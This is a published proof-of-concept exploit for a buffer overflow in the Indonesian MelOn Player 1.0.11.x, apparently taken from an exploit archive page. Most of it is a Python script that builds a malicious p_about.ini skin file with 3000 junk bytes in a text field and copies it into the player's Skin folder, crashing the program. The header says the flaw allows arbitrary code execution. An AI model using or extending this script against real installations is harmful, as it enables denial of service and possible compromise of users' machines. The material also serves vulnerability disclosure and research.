# Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
# Date: 09/09/2011
# Author: modpr0be
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
# Vulnerable version: 1.0.11.x
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
# CVE : N/A
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
#### Software description:
# Melon Player is a famous software in Indonesia to play songs that are provided by
# the Melon portal (http://www.melon.co.id). This software can play any music
# file types such as mp3, wav, wma, mp4, and others. This player can also play
# the files on your local computer or by online streaming to the portal Melon.
# The songs can also be downloaded to your local computer.
#
#### Vulnerable information:
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability
# when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file
# as part of skin template. This file will bring the program information and can be
# accessed on the menu (Menu ? Information)), as a result of adding extra bytes to
# parts of the file (Text section), giving the attackers possibility to run an arbitrary
# code execution on the system that install Melon Player.
#
### Some Conditions:
# This is just the POC, it will just crash the program.
# and it's unicode ;)
#
##
#!/usr/bin/python
import os,sys,shutil,time
header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=
[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34
[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10
[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13
[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20
[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=
[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")
footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")
filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:\Program Files\MelonPlayerID\Skin"
junk = "A" * 3000
buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170\r\n""")
banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy :)
=====================================================
""")
file=open(filename,'w')
if os.name == 'nt':
if os.path.isdir(skindir):
try:
file.write(header+buggy+footer)
print banner
print "[*] Creating the malicious .ini file.."
time.sleep(2)
print "[*] Malicious file (POC)",filename,"created.."
print "[*] Path:",splash
file.close()
shutil.copy2(splash,skindir)
print "[*] File",filename,"has been copied to",skindir
except IOError:
print "[-] Could not write to destination folder, check permission.."
sys.exit()
else:
print "[-] Could not find Skin directory, is MelOn Player installed?"
sys.exit()
else:
print "[-] Please run this script on Windows."
sys.exit()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation